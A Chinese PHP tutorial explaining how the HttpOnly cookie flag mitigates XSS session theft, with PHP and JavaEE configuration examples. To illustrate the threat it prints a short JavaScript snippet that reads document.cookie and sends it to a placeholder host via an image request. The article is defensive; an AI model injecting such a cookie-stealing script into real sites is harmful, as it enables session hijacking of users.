• 技术文章 >后端开发 >php教程

    php利用httponly防xss攻击

    怪我咯怪我咯2017-07-12 15:30:49原创968
    1. 什么是HttpOnly?

      如果您在cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击,具体一点的介绍请google进行搜索

    2. javaEE的API是否支持?

    目前sun公司还没有公布相关的API,但PHP、C#均有实现。搞javaEE的兄弟们比较郁闷了,别急下文有变通实现

    3.HttpOnly的设置样例

    javaEE
    response.setHeader("Set-Cookie", "cookiename=value;
    Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");

    这篇文章主要介绍了xss防御之php利用httponly防xss攻击,下面是PHP设置HttpOnly的方法,需要的朋友可以参考下

    xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。

    如下js获取cookie信息:

    代码如下:

    url=document.top.location.href;
    cookie=document.cookie;
    c=new Image();
    c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

    一般cookie都是从document对象中获取的,现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。

    PHP设置HttpOnly

    //在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
    ini_set("session.cookie_httponly", 1);
    
    //或者setcookie()的第七个参数设置为true
    session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

    对于PHP5.1以前版本的PHP通过:

    header("Set-Cookie: hidden=value; httpOnly");

    最后,HttpOnly不是万能的!

    以上就是php利用httponly防xss攻击的详细内容,更多请关注php中文网其它相关文章!

    声明:本文原创发布php中文网,转载请注明出处,感谢您的尊重!如有疑问,请联系admin@php.cn处理
    专题推荐:httponly php 攻击
    上一篇:php 自动跳转中英文页面示例代码 下一篇:php Codeigniter实现智能裁剪图片的方法
    大前端线上培训班

    相关文章推荐

    • PHP中怎样去判断对象是否属于一个类?• 你必须了解PHP中什么是抽象类和抽象方法• 五分钟带你看PHP中的接口interface声明与应用(实例详解)• PHP中怎样完成Cookie的创建、读取和删除?• PHP中怎样完成Session的设置、获取和删除?

    全部评论我要评论

  • 取消发布评论发送
  • 1/1

    PHP中文网